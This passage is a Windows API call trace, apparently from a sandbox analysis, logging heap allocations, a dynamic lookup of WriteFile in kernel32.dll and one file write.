lpMsg=0x87f36c) returned 0 [0162.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0162.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0162.260] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0162.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0162.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0162.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0162.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0162.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0162.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0162.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0162.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0162.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1770 [0162.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0162.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0162.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0162.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0162.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0162.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0162.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0162.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0162.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0162.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0162.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0162.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0162.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0162.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0162.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0162.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0162.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1af0 [0162.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0162.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0162.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b20 [0162.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0162.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd438 [0162.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0162.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0162.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0162.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0162.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0162.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0162.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0162.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0162.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0162.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0162.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0162.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0162.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0162.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0162.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0162.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0162.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0162.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0162.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0162.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0162.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0162.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0162.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0162.263] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0162.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0162.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0162.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0162.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0162.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0162.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0162.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0162.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0162.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0162.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0162.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0162.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0162.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0162.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0162.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0162.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0162.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0162.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0162.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0162.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0162.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0162.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0162.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0162.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0162.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0162.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0162.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0162.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0162.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0162.265] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0162.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0162.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0162.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0162.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0162.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0162.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0162.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0162.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0162.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0162.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0162.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0162.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0162.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0162.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0162.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0162.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0162.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0162.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0162.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0162.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0162.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0162.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0162.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0162.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0162.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0162.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0162.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0162.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0162.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0162.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0162.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0162.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0162.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0162.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0162.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0162.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0162.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0162.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0162.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0162.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0162.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0162.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0162.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0162.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0162.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0162.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0162.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0162.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0162.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0162.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.268] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0162.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0162.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0162.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0162.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9ba0d8 [0162.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba0d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0162.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0162.268] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0162.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0162.268] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0162.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0162.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0162.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0162.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0162.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0162.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0162.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0162.269] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0162.269] WriteFile (in: hFile=0x138, lpBuffer=0x9c5180*, nNumberOfBytesToWrite=0xf55d, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesWritten=0x87eae0*=0xf55d, lpOverlapped=0x0) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0162.270] FreeLibrary (hLibModule=0x75990000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0162.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0162.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0162.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0162.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0162.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0162.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0162.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0162.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0162.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0162.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0162.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 